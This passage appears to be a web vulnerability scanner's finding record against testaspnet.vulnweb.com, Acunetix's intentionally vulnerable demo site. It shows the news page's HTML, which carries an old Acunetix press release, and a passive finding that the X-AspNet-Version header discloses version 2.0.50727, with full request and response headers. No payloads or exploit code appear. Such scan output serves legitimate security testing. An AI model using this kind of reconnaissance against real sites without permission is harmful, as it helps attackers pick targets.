ICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo+fii5vVAAhGyfGRVNk1" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLjj6S6DAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJXwOObHp1dq30nemUavTDCszjxx" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
Method	GET
Parameter
Attack
Evidence	2.0.50727
Show / hide Request and Response
Request Header - size: 349 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=3 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 17979
Response Body - size: 17,979 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" 